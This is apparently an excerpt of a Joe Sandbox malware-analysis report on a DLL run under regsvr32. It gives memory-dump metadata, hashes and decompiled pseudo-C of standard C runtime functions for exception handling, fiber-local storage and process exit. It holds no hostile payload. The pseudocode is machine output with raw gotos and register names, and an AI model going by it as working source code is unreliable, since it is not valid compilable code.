                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                • String ID: api-ms-
                                                                                                • API String ID: 2559590344-2084034818
                                                                                                • Opcode ID: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                • Instruction ID: a281eee05f5572a15ea3fe0403c4f12dabc44bbec878773a6143b276462e3048
                                                                                                • Opcode Fuzzy Hash: d92b391dc074c551f2fff15d3caa28434169fc5b46989934520673f65e9ea010
                                                                                                • Instruction Fuzzy Hash: 9F31F276302B48A1EE93DB02A8007D533E4B70DBE4F598625BE2D0B3A0EF39C24C8705
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 2506987500-0
                                                                                                • Opcode ID: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                • Instruction ID: c3c6b15d1e2a8e36adeeaa1ee2c0ab8803bf36c1bad1bc725f34006b2089cb00
                                                                                                • Opcode Fuzzy Hash: 5bc48b536716d6500d6b4fd732b8b14869dbb673373b5a9a242e628548633fb8
                                                                                                • Instruction Fuzzy Hash: A5214F3470668C42FAE7E73195553ED72926B6C7F0F58C624B83A07BDBDE6C8A494700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                • String ID: CONOUT$
                                                                                                • API String ID: 3230265001-3130406586
                                                                                                • Opcode ID: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                • Instruction ID: 0de398e34c1669cec19602a54f8a011ae7faefe96049ea3591aa14d2bab58b4a
                                                                                                • Opcode Fuzzy Hash: 5f84935fb18113dc5388fb9af56135c4a8d61c8a22428d4b494f05fe971ce8aa
                                                                                                • Instruction Fuzzy Hash: 7F115B31610F4886E7939B52F85439A73A0F79CBE4F048225FA5E87BA4CF78CA488740
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetLastError.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F3F
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007F75
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FA2
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FB3
                                                                                                • FlsSetValue.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FC4
                                                                                                • SetLastError.KERNEL32(?,?,0000EAED15642A89,00000001800086FD,?,?,?,?,000000018000D08A,?,?,00000000,000000018000A3A3,?,?,?), ref: 0000000180007FDF
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value$ErrorLast
                                                                                                • String ID:
                                                                                                • API String ID: 2506987500-0
                                                                                                • Opcode ID: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                • Instruction ID: b3640c739d53f521f3aff5ec24f9b4829142f54ff52cb57a8f227eaee239dcc8
                                                                                                • Opcode Fuzzy Hash: eb8af4af359d96366aaa10eae491533e56ca08d7f11ac2249f998e933b1e40b3
                                                                                                • Instruction Fuzzy Hash: 72115C3070964942FAEBE32195453F972926B9C7F0F18C625B83A077DBDE68C6498701
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: LoadMessage$StringTranslate$AcceleratorClassCreateCursorDispatchRegisterWindow
                                                                                                • String ID:
                                                                                                • API String ID: 1967609040-0
                                                                                                • Opcode ID: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                • Instruction ID: 677205889e0bc738131920ca4d71d6e0d0c6d5bcb4ac294ec7d30bf60c9b59c6
                                                                                                • Opcode Fuzzy Hash: 75c1782b7f7e477433b17d4cbabed80ab7ba6ec157a4fc5f42b14144684d98ab
                                                                                                • Instruction Fuzzy Hash: 8611B932614E89D2E7A2DB61F8517DA7361F7D8784F508121FA8947A79DF3CC7198B00
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E00000001180003B5C(void* __esi, long long __rbx, intOrPtr* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r8, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32, signed int* _a40, char _a48, signed int _a56, signed int _a64) {
                                                                                                				signed int _v32;
                                                                                                				long long _v40;
                                                                                                				char _v48;
                                                                                                				signed int* _v56;
                                                                                                				void* _t55;
                                                                                                				intOrPtr _t60;
                                                                                                				signed int _t101;
                                                                                                				void* _t109;
                                                                                                				intOrPtr _t111;
                                                                                                				signed int* _t115;
                                                                                                				intOrPtr* _t136;
                                                                                                				void* _t139;
                                                                                                				void* _t142;
                                                                                                				void* _t144;
                                                                                                				void* _t158;
                                                                                                				void* _t159;
                                                                                                
                                                                                                				_t109 = _t144;
                                                                                                				 *((long long*)(_t109 + 8)) = __rbx;
                                                                                                				 *((long long*)(_t109 + 0x10)) = __rbp;
                                                                                                				 *((long long*)(_t109 + 0x18)) = __rsi;
                                                                                                				 *((long long*)(_t109 + 0x20)) = __rdi;
                                                                                                				_t136 = __rcx;
                                                                                                				_t139 = __r9;
                                                                                                				_t159 = __r8;
                                                                                                				_t142 = __rdx;
                                                                                                				E00000001180004584(_t55, __r8);
                                                                                                				E00000001180002D40(_t109);
                                                                                                				_t115 = _a40;
                                                                                                				if ( *((intOrPtr*)(_t109 + 0x40)) != 0) goto 0x80003bde;
                                                                                                				if ( *__rcx == 0xe06d7363) goto 0x80003bde;
                                                                                                				if ( *__rcx != 0x80000029) goto 0x80003bc2;
                                                                                                				if ( *((intOrPtr*)(__rcx + 0x18)) != 0xf) goto 0x80003bc6;
                                                                                                				if ( *((long long*)(__rcx + 0x60)) == 0x19930520) goto 0x80003bde;
                                                                                                				if ( *__rcx == 0x80000026) goto 0x80003bde;
                                                                                                				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003bde;
                                                                                                				if ((_t115[9] & 0x00000001) != 0) goto 0x80003d6d;
                                                                                                				if (( *(__rcx + 4) & 0x00000066) == 0) goto 0x80003c76;
                                                                                                				if (_t115[1] == 0) goto 0x80003d6d;
                                                                                                				if (_a48 != 0) goto 0x80003d6d;
                                                                                                				if (( *(__rcx + 4) & 0x00000020) == 0) goto 0x80003c63;
                                                                                                				if ( *__rcx != 0x80000026) goto 0x80003c41;
                                                                                                				_t60 = E00000001180002F2C(_t115, __r9,  *((intOrPtr*)(__r9 + 0x20)), __r9);
                                                                                                				if (_t60 - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                				if (_t60 - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                				r9d = _t60;
                                                                                                				E000000011800040F0(_t109, _t142, __r9, _t115);
                                                                                                				goto 0x80003d6d;
                                                                                                				if ( *_t136 != 0x80000029) goto 0x80003c63;
                                                                                                				r9d =  *((intOrPtr*)(_t136 + 0x38));
                                                                                                				if (r9d - 0xffffffff < 0) goto 0x80003d8d;
                                                                                                				if (r9d - _t115[1] >= 0) goto 0x80003d8d;
                                                                                                				goto 0x80003c31;
                                                                                                				E00000001180002004(r9d - _t115[1], _t109, _t115, __r9, __r9, _t115);
                                                                                                				goto 0x80003d6d;
                                                                                                				if (_t115[3] != 0) goto 0x80003cbe;
                                                                                                				if (( *_t115 & 0x1fffffff) - 0x19930521 < 0) goto 0x80003c9e;
                                                                                                				_t101 = _t115[8];
                                                                                                				if (_t101 == 0) goto 0x80003c9e;
                                                                                                				E00000001180002408(_t109);
                                                                                                				if (_t101 != 0) goto 0x80003cbe;
                                                                                                				if (( *_t115 & 0x1fffffff) - 0x19930522 < 0) goto 0x80003d6d;
                                                                                                				if ((_t115[9] >> 0x00000002 & 0x00000001) == 0) goto 0x80003d6d;
                                                                                                				if ( *_t136 != 0xe06d7363) goto 0x80003d34;
                                                                                                				if ( *((intOrPtr*)(_t136 + 0x18)) - 3 < 0) goto 0x80003d34;
                                                                                                				if ( *((intOrPtr*)(_t136 + 0x20)) - 0x19930522 <= 0) goto 0x80003d34;
                                                                                                				_t111 =  *((intOrPtr*)(_t136 + 0x30));
                                                                                                				if ( *((intOrPtr*)(_t111 + 8)) == 0) goto 0x80003d34;
                                                                                                				E0000000118000241C(_t111);
                                                                                                				if (_t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)) == 0) goto 0x80003d34;
                                                                                                				_v32 = _a64 & 0x000000ff;
                                                                                                				_v40 = _a56;
                                                                                                				_v48 = _a48;
                                                                                                				_v56 = _t115;
                                                                                                				 *0x80016370(_t158);
                                                                                                				goto 0x80003d72;
                                                                                                				_v32 = _a56;
                                                                                                				_v40 = _a48;
                                                                                                				_v48 = _a64;
                                                                                                				_v56 = _t115;
                                                                                                				E00000001180003328(_a64 & 0x000000ff, 0x80000026, __esi, _t136, _t142, _t159, _t139, _t111 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x30)) + 8)));
                                                                                                				return 1;
                                                                                                			}

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record__std_exception_copy
                                                                                                • String ID: csm$csm
                                                                                                • API String ID: 851805269-3733052814
                                                                                                • Opcode ID: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                • Instruction ID: ef6ae88387dfa06c815bde898961dd69fb07e80911919095ce8a45e838d8869a
                                                                                                • Opcode Fuzzy Hash: ae528b8b242bffcc2854918ec9a27d0bb976d941c4d1a74ac96dd6768b11b5c3
                                                                                                • Instruction Fuzzy Hash: C5617F3220078886EBB6CF26E44539877A9F758BD4F18C116EB9847BD5CF38D699C701
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 30%
                                                                                                			E00000001180002A84(void* __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r8, intOrPtr* __r9) {
                                                                                                				void* _t76;
                                                                                                				void* _t83;
                                                                                                				void* _t84;
                                                                                                				intOrPtr _t101;
                                                                                                				intOrPtr _t103;
                                                                                                				void* _t113;
                                                                                                				void* _t118;
                                                                                                				void* _t130;
                                                                                                				long long _t133;
                                                                                                				intOrPtr* _t135;
                                                                                                				signed long long _t144;
                                                                                                				void* _t150;
                                                                                                				signed long long _t154;
                                                                                                				void* _t156;
                                                                                                				long long _t158;
                                                                                                				intOrPtr* _t159;
                                                                                                				void* _t161;
                                                                                                				void* _t162;
                                                                                                				signed long long _t166;
                                                                                                				void* _t170;
                                                                                                				intOrPtr _t171;
                                                                                                				void* _t173;
                                                                                                				void* _t174;
                                                                                                				void* _t176;
                                                                                                				void* _t178;
                                                                                                				void* _t180;
                                                                                                				intOrPtr* _t181;
                                                                                                
                                                                                                				_t130 = __rax;
                                                                                                				 *((long long*)(_t161 + 8)) = __rbx;
                                                                                                				 *((long long*)(_t161 + 0x10)) = _t158;
                                                                                                				 *((long long*)(_t161 + 0x18)) = __rsi;
                                                                                                				_t162 = _t161 - 0x40;
                                                                                                				_t159 = __rcx;
                                                                                                				_t181 = __r9;
                                                                                                				_t174 = __rdx;
                                                                                                				E00000001180004584(_t76, __r8);
                                                                                                				_t171 =  *((intOrPtr*)(__r9 + 8));
                                                                                                				_t135 =  *((intOrPtr*)(__r9 + 0x38));
                                                                                                				_t178 =  *__r9 - _t171;
                                                                                                				_t103 =  *((intOrPtr*)(__r9 + 0x48));
                                                                                                				if (( *(__rcx + 4) & 0x00000066) != 0) goto 0x80002bac;
                                                                                                				 *((long long*)(_t162 + 0x30)) = __rcx;
                                                                                                				 *((long long*)(_t162 + 0x38)) = __r8;
                                                                                                				if (_t103 -  *_t135 >= 0) goto 0x80002c58;
                                                                                                				_t154 = __r8 + __r8;
                                                                                                				if (_t178 - _t130 < 0) goto 0x80002b9e;
                                                                                                				if (_t178 - _t130 >= 0) goto 0x80002b9e;
                                                                                                				if ( *((intOrPtr*)(_t135 + 0x10 + _t154 * 8)) == 0) goto 0x80002b9e;
                                                                                                				if ( *((intOrPtr*)(_t135 + 0xc + _t154 * 8)) == 1) goto 0x80002b2a;
                                                                                                				_t113 =  *((long long*)(_t130 + _t171))(_t180, _t176, _t173, _t170, _t150);
                                                                                                				if (_t113 < 0) goto 0x80002ba5;
                                                                                                				if (_t113 <= 0) goto 0x80002b9e;
                                                                                                				if ( *((intOrPtr*)(__rcx)) != 0xe06d7363) goto 0x80002b5b;
                                                                                                				if ( *0x800164f8 == 0) goto 0x80002b5b;
                                                                                                				if (E0000000118000F7F0(_t130 + _t171, _t135, 0x800164f8) == 0) goto 0x80002b5b;
                                                                                                				_t83 =  *0x800164f8();
                                                                                                				r8d = 1;
                                                                                                				_t84 = E00000001180004550(_t83, _t159 + _t171, _t174);
                                                                                                				_t101 =  *((intOrPtr*)(_t135 + 0x10 + _t154 * 8));
                                                                                                				r9d =  *_t159;
                                                                                                				 *((long long*)(_t162 + 0x28)) =  *((intOrPtr*)(_t181 + 0x40));
                                                                                                				_t133 =  *((intOrPtr*)(_t181 + 0x28));
                                                                                                				 *((long long*)(_t162 + 0x20)) = _t133;
                                                                                                				__imp__RtlUnwindEx();
                                                                                                				E00000001180004580(_t84);
                                                                                                				goto 0x80002ada;
                                                                                                				goto 0x80002c5d;
                                                                                                				_t156 =  *((intOrPtr*)(_t181 + 0x20)) - _t171;
                                                                                                				goto 0x80002c4e;
                                                                                                				_t144 = _t174 + _t174;
                                                                                                				if (_t178 - _t133 < 0) goto 0x80002c4c;
                                                                                                				_t118 = _t178 - _t133;
                                                                                                				if (_t118 >= 0) goto 0x80002c4c;
                                                                                                				r10d =  *(_t159 + 4);
                                                                                                				r10d = r10d & 0x00000020;
                                                                                                				if (_t118 == 0) goto 0x80002c21;
                                                                                                				r9d = 0;
                                                                                                				if (_t101 == 0) goto 0x80002c1c;
                                                                                                				r8d = r9d;
                                                                                                				_t166 = _t159 + _t159;
                                                                                                				if (_t156 - _t133 < 0) goto 0x80002c14;
                                                                                                				if (_t156 - _t133 >= 0) goto 0x80002c14;
                                                                                                				if ( *((intOrPtr*)(_t135 + 0x10 + _t166 * 8)) !=  *((intOrPtr*)(_t135 + 0x10 + _t144 * 8))) goto 0x80002c14;
                                                                                                				if ( *((intOrPtr*)(_t135 + 0xc + _t166 * 8)) ==  *((intOrPtr*)(_t135 + 0xc + _t144 * 8))) goto 0x80002c1c;
                                                                                                				r9d = r9d + 1;
                                                                                                				if (r9d - _t101 < 0) goto 0x80002be4;
                                                                                                				if (r9d != _t101) goto 0x80002c58;
                                                                                                				if ( *((intOrPtr*)(_t135 + 0x10 + _t144 * 8)) == 0) goto 0x80002c35;
                                                                                                				if (_t156 != _t133) goto 0x80002c4c;
                                                                                                				if (r10d != 0) goto 0x80002c58;
                                                                                                				goto 0x80002c4c;
                                                                                                				 *((intOrPtr*)(_t181 + 0x48)) = _t150 + 1;
                                                                                                				r8d =  *((intOrPtr*)(_t135 + 0xc + _t144 * 8));
                                                                                                				 *((long long*)(_t166 + _t171))();
                                                                                                				if (_t103 + 2 -  *_t135 < 0) goto 0x80002bb8;
                                                                                                				return 1;
                                                                                                			}






























                                                                                                Instruction addresses:
                                                                                                0x180002a84 0x180002a84 0x180002a89 0x180002a8e 0x180002a9c 0x180002aa0 0x180002aa3 0x180002aac
                                                                                                0x180002aaf 0x180002ab4 0x180002abb 0x180002abf 0x180002ac6 0x180002aca 0x180002ad0 0x180002ad5
                                                                                                0x180002adc 0x180002ae4 0x180002aee 0x180002afb 0x180002b06 0x180002b11 0x180002b24 0x180002b26
                                                                                                0x180002b28 0x180002b31 0x180002b3b 0x180002b4b 0x180002b55 0x180002b5f 0x180002b6b 0x180002b77
                                                                                                0x180002b7e 0x180002b85 0x180002b8a 0x180002b8e 0x180002b93 0x180002b99 0x180002ba0 0x180002ba7
                                                                                                0x180002bb0 0x180002bb3 0x180002bba 0x180002bc4 0x180002bce 0x180002bd1 0x180002bd3 0x180002bd7
                                                                                                0x180002bdb 0x180002bdd 0x180002be2 0x180002be4 0x180002be7 0x180002bf2 0x180002bfc 0x180002c07
                                                                                                0x180002c12 0x180002c14 0x180002c1a 0x180002c1f 0x180002c27 0x180002c2c 0x180002c31 0x180002c33
                                                                                                0x180002c3b 0x180002c3f 0x180002c49 0x180002c52 0x180002c7a

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                • String ID: csm$f
                                                                                                • API String ID: 2395640692-629598281
                                                                                                • Opcode ID: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                • Instruction ID: 7da8602e18cf7747c8af8830ce248ccf40cfdad7849785c1bee6e388392e864c
                                                                                                • Opcode Fuzzy Hash: 070144b75550352a73c6d3aac74e800b407a2bb3a1770ad1b71378010d6fc6ef
                                                                                                • Instruction Fuzzy Hash: D551BD32601A588AEBAADF15E844B9D37A5F348BC8F51C121FE1A47789DF74DA89C700
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                • API String ID: 4061214504-1276376045
                                                                                                • Opcode ID: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                • Instruction ID: 6c3fae355f4def66f2243ece08b04bf3b1533bf3e7ed4235295a513a2b2c2168
                                                                                                • Opcode Fuzzy Hash: 3542164dc526b5714268e5d0b360aad3ca74f158add73c29f1e3478b68115295
                                                                                                • Instruction Fuzzy Hash: 62F06D75714E0891FB92CB24E8443EA6371EB8DBE1F588215FA6A462F6CF2CC24CC300
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E000000011800077FC(signed int __ecx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                                                                				signed int _t27;
                                                                                                				signed int _t28;
                                                                                                				signed int _t29;
                                                                                                				signed int _t30;
                                                                                                				signed int _t31;
                                                                                                				signed int _t42;
                                                                                                				signed int _t43;
                                                                                                				signed int _t44;
                                                                                                				signed int _t46;
                                                                                                				void* _t51;
                                                                                                
                                                                                                				_a8 = __rbx;
                                                                                                				_a16 = __rsi;
                                                                                                				_t27 = __ecx & 0x0000001f;
                                                                                                				if ((__ecx & 0x00000008) == 0) goto 0x8000782e;
                                                                                                				if (sil >= 0) goto 0x8000782e;
                                                                                                				E0000000118000BC4C(_t27, _t51);
                                                                                                				_t28 = _t27 & 0xfffffff7;
                                                                                                				goto 0x80007885;
                                                                                                				_t42 = 0x00000004 & dil;
                                                                                                				if (_t42 == 0) goto 0x80007849;
                                                                                                				asm("dec eax");
                                                                                                				if (_t42 >= 0) goto 0x80007849;
                                                                                                				E0000000118000BC4C(_t28, _t51);
                                                                                                				_t29 = _t28 & 0xfffffffb;
                                                                                                				goto 0x80007885;
                                                                                                				_t43 = dil & 0x00000001;
                                                                                                				if (_t43 == 0) goto 0x80007865;
                                                                                                				asm("dec eax");
                                                                                                				if (_t43 >= 0) goto 0x80007865;
                                                                                                				E0000000118000BC4C(_t29, _t51);
                                                                                                				_t30 = _t29 & 0xfffffffe;
                                                                                                				goto 0x80007885;
                                                                                                				_t44 = dil & 0x00000002;
                                                                                                				if (_t44 == 0) goto 0x80007885;
                                                                                                				asm("dec eax");
                                                                                                				if (_t44 >= 0) goto 0x80007885;
                                                                                                				if ((dil & 0x00000010) == 0) goto 0x80007882;
                                                                                                				E0000000118000BC4C(_t30, _t51);
                                                                                                				_t31 = _t30 & 0xfffffffd;
                                                                                                				_t46 = dil & 0x00000010;
                                                                                                				if (_t46 == 0) goto 0x8000789f;
                                                                                                				asm("dec eax");
                                                                                                				if (_t46 >= 0) goto 0x8000789f;
                                                                                                				E0000000118000BC4C(_t31, _t51);
                                                                                                				return 0 | (_t31 & 0xffffffef) == 0x00000000;
                                                                                                			}

                                                                                                Instruction addresses:
                                                                                                0x1800077fc 0x180007801 0x180007810 0x180007818 0x18000781d 0x180007824 0x180007829 0x18000782c
                                                                                                0x180007833 0x180007836 0x180007838 0x18000783d 0x18000783f 0x180007844 0x180007847 0x180007849
                                                                                                0x18000784d 0x18000784f 0x180007854 0x18000785b 0x180007860 0x180007863 0x180007865 0x180007869
                                                                                                0x18000786b 0x180007870 0x180007876 0x18000787d 0x180007882 0x180007885 0x180007889 0x18000788b
                                                                                                0x180007890 0x180007897 0x1800078b5

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: _set_statfp
                                                                                                • String ID:
                                                                                                • API String ID: 1156100317-0
                                                                                                • Opcode ID: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                • Instruction ID: 766be9376166aa195c434f29f3971196c8b67f74f947fd55b9f7e9fcb960d4ba
                                                                                                • Opcode Fuzzy Hash: 2487fe653e5be7bd8020c0b0ea1e85e42b79556fc3c932490e66e5a61226e724
                                                                                                • Instruction Fuzzy Hash: 3D117736F90A0941F7EE9128D45A3E63141AB6C3F4F59C624B66E462E7CF2C4B59C305
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FlsGetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008017
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008036
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000805E
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 000000018000806F
                                                                                                • FlsSetValue.KERNEL32(?,?,?,000000018000827B,?,?,00000000,0000000180008516,?,?,?,?,?,00000001800084A2), ref: 0000000180008080
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000B.00000002.334858582.0000000180001000.00000020.00000001.01000000.00000009.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                • Associated: 0000000B.00000002.334853389.0000000180000000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334870999.0000000180016000.00000002.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334904837.0000000180021000.00000004.00000001.01000000.00000009.sdmp
                                                                                                • Associated: 0000000B.00000002.334912376.0000000180023000.00000002.00000001.01000000.00000009.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_11_2_180000000_regsvr32.jbxd
                                                                                                Similarity
                                                                                                • API ID: Value
                                                                                                • String ID:
